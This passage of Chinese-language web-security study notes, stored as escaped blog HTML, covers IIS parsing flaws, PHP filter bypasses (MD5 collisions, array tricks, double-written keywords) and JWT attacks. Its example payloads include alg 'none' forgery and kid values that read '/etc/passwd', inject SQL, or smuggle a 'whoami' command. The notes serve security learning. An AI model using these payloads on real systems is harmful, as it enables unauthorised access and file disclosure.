has-text-color\">\u5728<strong>IIS-5.x&amp;6.0<\/strong>\u4e0b\uff0c\u5bf9\u4e8e\u76ee\u5f55\u540d\u79f0\u4e3a\u201cxxx.asp\u201d\u76ee\u5f55\u4e0b\u7684<strong>\u4efb\u4f55\u5185\u5bb9<\/strong>\u5305\u62ec\u201cxxx.jpg\u201d<strong>\u56fe\u7247\u6587\u4ef6<\/strong>\u90fd\u4f1a\u88ab<strong>\u5f53\u4f5casp\u6587\u4ef6\u89e3\u6790<\/strong>\u3002\u6240\u4ee5\u82e5\u53ef\u4ee5\u63a7\u5236\u5728\u670d\u52a1\u5668\u4e0a\u521b\u5efa\u7684\u76ee\u5f55\u540d\u79f0\uff08\u6709\u4e9b\u7f51\u7ad9\u652f\u6301\u7528\u6237\u81ea\u5df1\u521b\u5efa\u76ee\u5f55\uff09\uff0c\u5373\u4f7f\u4e0a\u4f20\u7684\u662f\u56fe\u7247\u4e5f\u53ef\u4ee5\u5b9e\u73b0\u6728\u9a6c\u4e0a\u4f20\u3001\u540e\u95e8\u8fde\u63a5\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u5206\u53f7\u622a\u65ad\u6f0f\u6d1e<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>IIS-6.0<\/strong>\u4e0b\u4f1a\u5c06\u201c1.asp;jpg\u201d\u5f53\u4f5casp\u6587\u4ef6\u89e3\u6790\u3002\u539f\u56e0\uff1a\u6587\u4ef6\u6269\u5c55\u540d\u4ee5\u6700\u540e\u4e00\u4e2a\u201c.\u201d\u540e\u9762\u5185\u5bb9\u4e3a\u4f9d\u636e\uff0c\u6240\u4ee5\u5728\u7f51\u7ad9\u8fc7\u6ee4\u7a0b\u5e8f\u4e2d\u88ab\u7406\u89e3\u4e3a\u56fe\u7247\u3002\u800c\u5728IIS\u4e2d\u4f1a\u8ba4\u4e3a\u5206\u53f7\u201c;\u201d\u5373\u662f\u7ed3\u5c3e\uff0c\u540e\u9762\u7684\u5185\u5bb9\u4f1a\u88ab\u622a\u65ad\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-ASPX\u5b89\u5168(.NET)<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">.aspx\u662fASP.NET \u9875\u9762\u7684\u6269\u5c55\u540d\u3002\u5b83\u65e0\u975e\u662f\u5728\u9759\u6001HTML\u7f51\u9875\u91cc\u9762\u5d4c\u5165\u4e86\u52a8\u6001\u7684\u6307\u4ee4\uff08\u8fd9\u4e9b\u52a8\u6001\u6307\u4ee4\u662f\u7531\u5404\u79cd\u811a\u672c\u8bed\u8a00\u7f16\u5199\u7684\uff0c\u662f\u7531IIS\u670d\u52a1\u5668\u4e0a\u7684\u811a\u672c\u5f15\u64ce\u6765\u6267\u884c\u7684\uff09\u800c\u5df2\u3002\u5982\u679c\u6d4f\u89c8\u5668\u8bf7\u6c42\u67d0\u5f20 ASP.NET \u9875\u9762\uff0c\u90a3\u4e48\u5728\u628a\u7ed3\u679c\u53d1\u56de\u6d4f\u89c8\u5668\u4e4b\u524d\uff0c\u670d\u52a1\u5668\u9996\u5148\u4f1a\u5904\u7406\u9875\u9762\u4e2d\u7684\u53ef\u6267\u884c\u4ee3\u7801\uff08\u5373\uff0c\u811a\u672c\u8bed\u8a00\u4ee3\u7801 \uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">.NET\u662f\u5fae\u8f6f\u5f00\u53d1\u7684\u8bed\u8a00\u6846\u67b6\uff0c\u901a\u5e38\u7528\u5728IIS\u4e0a\uff0c\u5173\u952e\u4ee3\u7801<strong>\u5c01\u88c5<\/strong>\u5230DLL\u6587\u4ef6\u4e2d\uff0c\u4fbf\u4e8e\u5728\u522b\u7684\u6587\u4ef6\u5f00\u53d1\u4e2d\u8fdb\u884c\u8c03\u7528\uff08\u7c7b\u4f3cjava\u4e2d\u7684jar\u5305\uff09\u3002 <\/p>\n\n\n\n<h4 class=\"wp-block-heading\">.NET\u9879\u76ee-DLL\u6587\u4ef6\u53cd\u7f16\u8bd1\u6307\u5411<\/h4>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u53cd\u7f16\u8bd1\u5de5\u5177\uff1aILSpy<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">aspx\u6587\u4ef6\u4e0b\u7684<strong>Inherits<\/strong>\u6307\u660e\u4e86<strong>\u8c03\u7528\u7684DLL\u6587\u4ef6<\/strong>\u3002\u82e5aspx\u4e0b\u4ee3\u7801\u660e\u663e\u4e0d\u80fd\u6ee1\u8db3\u9875\u9762\u5448\u73b0\u51fa\u7684\u529f\u80fd\uff0c\u5219\u53ef\u4ee5\u5728DLL\u6587\u4ef6\u53cd\u7f16\u8bd1\u540e\u5bfb\u627e\u8c03\u7528\u7684DLL\uff0c\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">.NET\u9879\u76ee-\u914d\u7f6e\u8c03\u8bd5&amp;\u4fe1\u606f\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>web.config<\/strong>\uff08\u7f51\u7ad9\u914d\u7f6e\u6587\u4ef6\uff09\u4e0b\u6709\u4e00\u4e2a\u914d\u7f6e\u9879<strong>&lt;customErrors mode=&#8221;\u72b6\u6001&#8221;&gt;<\/strong>\u3002\u82e5\u72b6\u6001\u4e3a<strong>Off<\/strong>\uff0c\u5219\u5f53\u7f51\u7ad9\u51fa\u73b0\u62a5\u9519\u65f6\u5c06\u6309<strong>\u9ed8\u8ba4\u65b9\u5f0f<\/strong>\u62a5\u51fa\u9519\u8bef\u4fe1\u606f\uff08\u53ef\u80fd\u62a5\u51fa\u62a5\u9519\u7684\u6e90\u4ee3\u7801\u3001.NET\u7248\u672c\u3001\u6587\u4ef6\u81ea\u8eab\u8def\u5f84\uff09\uff1b\u82e5\u72b6\u6001\u4e3a<strong>On<\/strong>\uff08\u62a5\u9519\u65b9\u5f0f\u7531\u5f00\u53d1\u8005\u81ea\u5b9a\u4e49\uff09\u5219\u6309\u5f00\u53d1\u8005<strong>\u81ea\u5b9a\u4e49<\/strong>\u7684\u65b9\u5f0f\u8fdb\u884c\u62a5\u9519\u5904\u7406\uff0c\u800c\u5f00\u53d1\u8005\u6ca1\u6709\u8fdb\u884c\u81ea\u5b9a\u4e49\u7684\u8bdd\u5c06\u4f1a\u62a5\u51fa\u6e90\u4ee3\u7801\u3001\u6587\u4ef6\u8def\u5f84\uff0c\u9020\u6210<strong>\u4fe1\u606f\u6cc4\u9732\uff0c\u5371\u5bb3\u4e0d\u5927<\/strong>\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">.NET\u9879\u76ee-\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7f51\u7ad9\u5224\u65ad\u7528\u6237\u8eab\u4efd\u7684\u4e24\u4e2a\u601d\u8def\uff1a\uff08\u540e\u53f0\u672c\u8eab\u542b\u6709\u591a\u4e2a\u529f\u80fd\u6587\u4ef6\u9875\u9762\uff09<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5728\u6bcf\u4e2a\u6587\u4ef6\u4e2d\u6dfb\u52a0\u5224\u65ad\u4ee3\u7801<\/li>\n\n\n\n<li>\u521b\u5efa\u4e00\u4e2a\u6587\u4ef6\u4e13\u95e8\u7528\u6765\u5224\u65ad\u8eab\u4efd\uff0c\u5176\u4ed6\u6587\u4ef6\u5305\u542b\u8c03\u7528\u5b83<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e8e\u662f\u6709\u51e0\u4e2a\u5bfb\u627e\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e\u7684\u601d\u8def\uff1a<strong>\uff08\u767d\u76d2\u6d4b\u8bd5\uff09<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5bfb\u627e\u6ca1\u6709\u9a8c\u8bc1\u4ee3\u7801\u6216\u6ca1\u6709\u5305\u542b\u8c03\u7528\u2018\u9a8c\u8bc1\u4ee3\u7801\u6587\u4ef6\u2019\u7684\u6587\u4ef6<\/li>\n\n\n\n<li>\u8ddf\u8e2a\u68c0\u6d4b\u2018\u9a8c\u8bc1\u4ee3\u7801\u6587\u4ef6\u2019\u662f\u5426\u53ef\u4ee5\u7ed5\u8fc7\uff08\u5173\u6ce8Inherits\u6807\u7b7e\uff09<\/li>\n<\/ol>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u82e5\u662f\u5728<strong>\u9ed1\u76d2\u6d4b\u8bd5<\/strong>\u5219\u53ef\u4ee5\u901a\u8fc7\u5199\u811a\u672c\u5de5\u5177\u627e\u51fa\u2018\u9a8c\u8bc1\u4ee3\u7801\u6587\u4ef6\u2019\u4ee5\u53ca\u6ca1\u6709\u8c03\u7528\u2018\u9a8c\u8bc1\u4ee3\u7801\u6587\u4ef6\u2019\u7684\u6587\u4ef6\uff08\u4f8b\u5982\u901a\u8fc7\u5224\u65adInherits\u7684\u503c\uff09\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u516b\u5929\uff1aWEB\u653b\u9632\uff08\u4e8c\uff09<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-PHP\u5b89\u5168<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u8fc7\u6ee4\u51fd\u6570\u7f3a\u9677\u7ed5\u8fc7<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">==\u4e0e===<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">=\uff1a\u8d4b\u503c<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">==\uff1a\u5bf9\u6bd4\uff08\u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c<strong>\u4e0d\u4f1a\u6bd4\u8f83\u7c7b\u578b<\/strong>\uff09\uff1b$a = 1\uff0c$b = 1ad\uff0c$a == $b\u6210\u7acb<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">===\u5bf9\u6bd4\uff08\u4f1a<strong>\u6bd4\u8f83\u7c7b\u578b<\/strong>\uff09\uff1b<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">MD5<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>if($_GET&#91;'name'] != $_GET&#91;'password']){\n    if(MD5($_GET&#91;'name']) == MD5($_GET&#91;'password'])){\n        echo $flag;\n    }\n    echo 'Wrong';\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e24\u79cd\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">1.MD5(&#8216;QNKCDZO&#8217;)=<strong>0e<\/strong>8304&#8230;..\uff1bMD5(&#8216;240610708&#8217;)=<strong>0e<\/strong>4620&#8230;.\uff1b\uff08MD5\u78b0\u649e\uff0c\u9650==\u5f31\u6bd4\u8f83\uff09\uff1b<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">2.[url]\/?name[]=1&amp;password[]=2\uff08\u6570\u7ec4\u7ed5\u8fc7\uff0c\u5f31\u3001\u5f3a\u6bd4\u8f83\u7686\u53ef\uff09MD5\u65e0\u6cd5\u5904\u7406\u6570\u7ec4\uff0c\u4f1a\u8fd4\u56deNULL\u503c\uff0cNULL == NULL\uff0cNULL === NULL\uff0c\u90fd\u6210\u7acb\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">intval<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">intval( )\u7528\u4e8e\u83b7\u53d6\u53d8\u91cf\u7684\u6574\u6570\u503c\uff1aintval(4.2)=4\uff1b\u5176\u5b83\u8fdb\u5236\u4f1a\u9ed8\u8ba4\u8f6c\u4e3a\u5341\u8fdb\u5236\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">strpos<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">strpos( )\u7528\u4e8e\u67e5\u627ea\u5b57\u7b26\u5728b\u5b57\u7b26\u4e2d\u51fa\u73b0\u7684\u4f4d\u7f6e\uff1b\u82e5\u76ee\u6807\u6570\u503c\u4e3a666\u53ef\u6784\u9020?num=%0a666\u3002\uff08\u5229\u7528%0a\u6362\u884c\u7b26\u8fdb\u884c\u7ed5\u8fc7\uff09<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">in_array<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4ece\u6570\u7ec4\u4e2d\u627e\u5339\u914d\u9879\uff0c\u53c2\u6570\u9009\u9879strict\uff08\u5173\u6ce8\u70b9\uff09\u4e3aTRUE\u5219\u4f1a\u6bd4\u8f83\u7c7b\u578b\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">preg_match<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6267\u884c\u6b63\u5219\u8868\u8fbe\u5f0f\uff0c\u7528\u4e8e\u5b57\u7b26\u4e32\u5339\u914d\uff1b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if(isset($_GET&#91;'num'])){\n    $num = $_GET&#91;'num'];\n    if(preg_match(\"\/0-9]\/\",$num)){\n        die(\"Wrong\");\n    }\n    if(intval($num)){\n        echo flag;\n    }\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">preg_match\u53ea\u80fd\u5904\u7406\u5b57\u7b26\u4e32\uff0c<strong>\u4e0d\u80fd\u5904\u7406\u6570\u7ec4<\/strong>\uff0c\u6240\u4ee5\u4e5f\u80fd<strong>\u6570\u7ec4\u7ed5\u8fc7<\/strong>\uff1a\u6784\u9020 ?num[]=1\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">str_replace<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6700\u7b80\u5355\u7684\u4e00\u4e2a\u8fc7\u6ee4\uff1a\u5339\u914d\u5230\u76ee\u6807\u5b57\u7b26\u5219\u66ff\u6362\u6210\u6307\u5b9a\u5b57\u7b26\uff1b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sql = $_GET&#91;'s'];\n$sql = str_replace('select','',$sql);\necho $sql;<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u53cc\u5199\u7ed5\u8fc7\uff1a?sql=seselectlect * from &#8230;.\uff1b\u539f\u56e0\uff1astr_replace\u4e0d\u53ef\u8fed\u4ee3\u8fc7\u6ee4\uff0c\u53ea\u80fd\u8fc7\u6ee4\u4e00\u6b21\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-JAVA\u5b89\u5168<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u5728JavaWeb\u6d4b\u8bd5\u4e2d\uff0c\u5927\u90e8\u5206\u5b89\u5168\u95ee\u9898\u9700\u8981\u4ece\u6e90\u7801\u4e2d\u5206\u6790\u5404\u79cd\u4f9d\u8d56\u548c\u8def\u5f84\uff0c\u56e0\u6b64\u9ed1\u76d2\u6d4b\u8bd5\u662f\u5f88\u56f0\u96be\u7684\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>WebGoat8\u9776\u573a<\/strong>\uff1a<a rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\" href=\"https:\/\/github.com\/WebGoat\/WebGoat\" target=\"_blank\">https:\/\/github.com\/WebGoat\/WebGoat<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u9776\u573a\u642d\u5efa\uff1ajava.exe -jar webgoat-server-8.1.0.jar &#8211;server.port=[\u670d\u52a1\u7aef\u53e3]<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">java\u628a\u6e90\u4ee3\u7801\u5199\u5230jar\u5305\u4e2d\uff0c\u5ba1\u8ba1\u524d\u5c06jar\u5305\u5728IDEA\u4e2d\u89e3\u538b\u6253\u5f00\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">JavaWeb\u5e38\u89c1\u5b89\u5168\u53ca\u4ee3\u7801\u903b\u8f91<\/h4>\n\n\n\n<h4 class=\"wp-block-heading\">\u76ee\u5f55\u904d\u5386&amp;\u8eab\u4efd\u9a8c\u8bc1&amp;\u903b\u8f91&amp;JWT<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u76ee\u5f55\u904d\u5386<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u60f3\u529e\u6cd5\u7ed5\u8fc7\u5bf9<strong>&#8216;..\/&#8217;<\/strong>\u7684\u8fc7\u6ee4\u5b9e\u73b0\u76ee\u5f55\u904d\u5386<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u903b\u8f91\u6f0f\u6d1e<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u63a5\u6536<strong>\u952e\u540dkey<\/strong>\u548c<strong>\u952e\u503cvalue<\/strong>\u5e76\u8fdb\u884c\u5224\u65ad\u3002\u4e00\u822c<strong>\u56fa\u5b9a\u63a5\u6536\u952e\u540d<\/strong>\uff08\u5b89\u5168\uff09\uff0c\u82e5\u4e0d\u56fa\u5b9a\u800c\u662f\u63a5\u6536\u952e\u540d\u4e0e\u952e\u503c\u8fdb\u884c\u5224\u65ad\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u6784\u9020<strong>\u4e0d\u5b58\u5728\u7684\u952e\u540d<\/strong>\u5e76\u8ba9\u952e\u503c\u4e3a\u7a7a\uff08\u4e24\u79cd\u60c5\u51b5\uff1a\u56e0\u4e3a\u539f\u6570\u636e\u5e93\u6216\u53d8\u91cf\u4e0d\u5b58\u5728\u7684\u952e\u540d\uff0c\u5176\u952e\u503c\u5c06\u4e3a\u7a7a\uff0c\u4e0e\u4f20\u5165\u7684\u952e\u503c\u76f8\u540c\uff1b\u539f\u6570\u636e\u5e93\u6216\u53d8\u91cf\u4e0d\u5b58\u5728\u7684\u952e\u540d\uff0c\u4e0e\u4f20\u5165\u503c\u6bd4\u8f83\u65f6\u9ed8\u8ba4\u4e3a\u6b63\u786e\uff09\u8fdb\u884c\u7ed5\u8fc7\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">JWT\u4ee4\u724c<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>Json Web Token<\/strong>\u4ee4\u724c\uff0c\u7528\u4e8e\u5728JavaWeb\u5e94\u7528\u4e2d\u9a8c\u8bc1\u7528\u6237\u8eab\u4efd\uff0c\u7531<strong>header<\/strong>\uff0c<strong>payload<\/strong>\uff0c<strong>signature<\/strong>\u4e09\u90e8\u5206\u7ec4\u6210\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">header\uff1a\u56fa\u5b9a\u5305\u542b\u7b97\u6cd5\u548ctoken\u7c7b\u578b\uff0c\u5bf9\u6b64json\u8fdb\u884cbase64url\u52a0\u5bc6\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u793a\u4f8b\n{\n    \"alg\" : \"HS256\",\n    \"typ\" : \"JWT\"\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">payload\uff1a\u6570\u636e\u90e8\u5206\uff0c\u5bf9\u6b64json\u8fdb\u884cbase64url\u52a0\u5bc6\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u793a\u4f8b\n{\n    \"sub\" : \"123456\",\n    \"name\" : \"John Doe\",\n    \"iat\" : 151624213\n    ...\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">signature\uff1a\u5c06\u524d\u4e24\u6bb5base\u5bc6\u6587\u901a\u8fc7&#8217;.&#8217;\u62fc\u63a5\u8d77\u6765\uff0c\u7136\u540e\u5bf9\u5176\u8fdb\u884chs256\u52a0\u5bc6\uff0c\u518d\u7136\u540e\u5bf9hs256\u5bc6\u6587\u8fdb\u884cbase64url\u52a0\u5bc6\uff0c\u6700\u7ec8\u5f97\u5230signature\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>siganature = base64url(HMACSHA256(base64UrlEncode(header)+\".\"+base64UrlEncode(payload),&#91;\u5bc6\u94a5]))<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5c06\u4e09\u90e8\u5206\u901a\u8fc7<strong>&#8220;.&#8221;<\/strong>\u8fde\u63a5\u5f97\u5230\u5b8c\u6574\u7684JWT\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>JWT\u653b\u51fb<\/strong>\uff1a\u5148\u5229\u7528<a rel=\"noreferrer noopener\" href=\"http:\/\/jwt.io\/\" target=\"_blank\"><em><strong>jwt.io<\/strong><\/em><\/a>\u7f51\u7ad9\u5728\u7ebf\u5de5\u5177\u8fdb\u884c\u89e3\u5bc6\u83b7\u5f97\u4ee4\u724c\u5185\u5bb9\uff08\u5f97\u4e0d\u5230\u7b2c\u4e09\u90e8\u5206\u7684\u5bc6\u94a5\uff09\uff0c\u5bf9\u5176\u4fee\u6539\u540e\u518d<strong>\u91cd\u65b0\u751f\u6210\u65b0JWT\u4ee4\u724c\uff08\u5373\u4ee4\u724c\u4f2a\u9020\uff09<\/strong>\u3002\u7531\u4e8e\u7f3a\u5c11\u7b2c\u4e09\u90e8\u5206\u7684\u5bc6\u94a5\uff0c\u65e0\u6cd5\u4f2a\u9020\u7b2c\u4e09\u90e8\u5206\uff0c\u56e0\u6b64\u4e0d\u80fd\u76f4\u63a5\u4f2a\u9020\u4ee4\u724c\u3002\u6709\u4e24\u79cd\u601d\u8def\uff1a<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7b2c\u4e00\u79cd\uff1a\u4fee\u6539\u7b2c\u4e00\u90e8\u5206header\u7684\u52a0\u5bc6\u65b9\u5f0f\u4e3a\u7a7a\u503c\u5373&#8221;alg&#8221; : &#8220;none&#8221;\uff0c\u4f7f\u7b2c\u4e09\u90e8\u5206\u7684\u4f2a\u9020\u4e0d\u9700\u8981\u5bc6\u94a5\uff0c\u4f46\u8fd9\u79cd\u65b9\u5f0f\u9700\u8981\u540e\u53f0\u914d\u7f6e\u6587\u4ef6\u652f\u6301\u52a0\u5bc6\u65b9\u5f0f\u4e3a\u7a7a\uff08\u7f55\u89c1\uff09\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u5c06\"alg\"\u7684\u952e\u503c\u6539\u4e3a\"none\"\n{\n    \"alg\" : \"none\",\n    \"typ\" : \"JWT\"\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7b2c\u4e8c\u79cd\uff1a\u6839\u636e\u5df2\u6709\u7684\u4ee4\u724c\u7b2c\u4e09\u90e8\u5206\u4e2d\u7684\u503c\u5bf9\u6bd4header\u3001payload\u7684base\u503c\uff08\u5373<strong>\u539f\u6587<\/strong>\uff09\u8fdb\u884c\u7206\u7834\u5f97\u5230\u5bc6\u94a5\u3002\u5b66\u8fc7\u5bc6\u7801\u5b66\u7684\u8bdd\uff0c\u5c31\u4f1a\u89c9\u5f97\u7206\u7834\u601d\u8def\u5f88\u57fa\u7840\u4e86\uff1a\u628a\u7206\u7834\u7528\u7684<strong>\u5b57\u5178\u4e2d\u7684\u503c<\/strong>\u4f5c\u4e3a<strong>\u5bc6\u94a5<\/strong>\uff0c\u52a0\u5bc6\u5f97\u5230signature\uff0c\u82e5\u4e0e\u539fsignature\u76f8\u540c\u5219\u5f97\u5230<strong>\u6b63\u786e\u5bc6\u94a5<\/strong>\u3002\u7206\u7834\u7684\u5173\u952e\u5728\u4e8e\u5b57\u5178\u591f\u4e0d\u591f\u5f3a\u4ee5\u53ca\u8017\u65f6\uff0c\u82e5\u5bc6\u94a5\u662f\u5f3a\u5bc6\u94a5\u4e14\u4f4d\u6570\u9ad8\uff0c\u90a3\u4e48\u7206\u7834\u51e0\u4e4e\u4e0d\u53ef\u80fd\u5b9e\u73b0\u3002\uff08\u8fd9\u4e00\u62f3\uff0c\u767e\u5e74\u5bc6\u7801\u5b66\u5386\u53f2\u7684\u529f\u592b\uff0c\u4f60\u9876\u7684\u4f4f\u5417\uff01\uff1f\uff09<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">JWT\u9020\u6210\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u82e5JWT\u7b2c\u4e00\u90e8\u5206\u5b58\u5728<strong>\u53c2\u6570kid<\/strong>\uff08\u7528\u4e8e\u8bfb\u53d6\u5bc6\u94a5\u6587\u4ef6\uff09\uff0c\u7531\u4e8e\u53c2\u6570\u5bf9\u7528\u6237\u6765\u8bf4\u53ef\u63a7\uff0c\u5982\u679c\u6ca1\u6709\u5bf9kid\u503c\u8fdb\u884c\u8fc7\u6ee4\u5c06\u53ef\u80fd\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u793a\u4f8b\n{\n    \"alg\" : \"HS256\",\n    \"typ\" : \"JWT\",\n    \"kid\" : \"\/home\/jwt\/.ssh\/pem\"\n    \/\/\u4fee\u6539kid\u503c\u5b9e\u73b0\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\n    \/\/\"kid\" : \"\/etc\/passwd\"\n}<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">JWT\u9020\u6210SQL\u6ce8\u5165<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>kid<\/strong>\u4e5f\u53ef\u4ee5\u4ece\u6570\u636e\u5e93\u4e2d\u63d0\u53d6\u6570\u636e\uff0c\u53ef\u80fd\u9020\u6210SQL\u6ce8\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u793a\u4f8b\n{\n    \"alg\" : \"HS256\",\n    \"typ\" : \"JWT\",\n    \"kid\" : \"key111 || union select .....&#91;SQL\u6ce8\u5165\u8bed\u53e5]\"\n}<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">JWT\u9020\u6210\u547d\u4ee4\u6ce8\u5165<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5bf9<strong>kid\u53c2\u6570<\/strong>\u8fc7\u6ee4\u4e0d\u4e25\u4e5f\u53ef\u80fd\u51fa\u73b0\u547d\u4ee4\u6ce8\u5165\uff0c\u4f46\u5229\u7528\u6761\u4ef6\u8f83\u4e25\u82db\u3002\u4f8b\u5982\uff0c\u82e5\u670d\u52a1\u5668\u540e\u7aef\u4f7f\u7528<strong>Ruby<\/strong>\uff0c\u5728\u8bfb\u53d6\u5bc6\u94a5\u6587\u4ef6\u65f6\u4f7f\u7528\u4e86<strong>open<\/strong>\u51fd\u6570\uff0c\u901a\u8fc7\u6784\u9020\u53c2\u6570\u53ef\u80fd\u9020\u6210\u547d\u4ee4\u6ce8\u5165\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/\u793a\u4f8b\n{\n    \"alg\" : \"HS256\",\n    \"typ\" : \"JWT\",\n    \"kid\" : \"\/path\/to\/key_file|whoami&#91;\u547d\u4ee4]\"\n}<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5bf9\u4e8e\u5176\u5b83\u8bed\u8a00\u4e5f\u53ef\u80fd\u5b58\u5728\uff0c\u4f8b\u5982<strong>php<\/strong>\uff0c\u5982\u679c\u4ee3\u7801\u4e2d\u4f7f\u7528<strong>exec<\/strong>\u6216<strong>system<\/strong>\u6765\u8bfb\u53d6\u5bc6\u94a5\u6587\u4ef6\uff0c\u90a3\u4e48\u4e5f\u53ef\u4ee5\u9020\u6210\u547d\u4ee4\u6ce8\u5165\uff08\u73b0\u5b9e\u4e2d\u51fa\u73b0\u53ef\u80fd\u8f83\u5c0f\uff0c\u4f46CTF\u8bf4\u4e0d\u5b9a\u4f1a\u6709\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u8bbf\u95ee\u63a7\u5236<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u9690\u85cf\u5c5e\u6027<\/strong>\uff1a\u524d\u7aef\u9875\u9762\u7684\u663e\u793a\u9650\u5236\u3002\u6709\u4e9b\u8fd4\u56de\u5305\u4e2d\u7684\u5c5e\u6027\u662f\u5f00\u53d1\u8005\u4e0d\u5e0c\u671b\u7528\u6237\u770b\u5230\u7684\uff0c\u4e8e\u662f\u5c06\u5176\u5728\u524d\u7aef\u9875\u9762\u4e2d\u9690\u85cf\uff0c\u4f46\u901a\u8fc7\u6293\u5305\u770b\u54cd\u5e94\u5305\u53ef\u4ee5\u770b\u5230\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7ec4\u4ef6\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5728\u5b9e\u9645\u6d4b\u8bd5\u4e2d\uff0c<strong>Java\u4ee3\u7801\u672c\u8eab<\/strong>\u7684\u5b89\u5168\u95ee\u9898\u8f83\u5c11\uff0c\u66f4\u591a\u7684\u4ece<strong>Java\u7ec4\u4ef6<\/strong>\u5165\u624b\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color 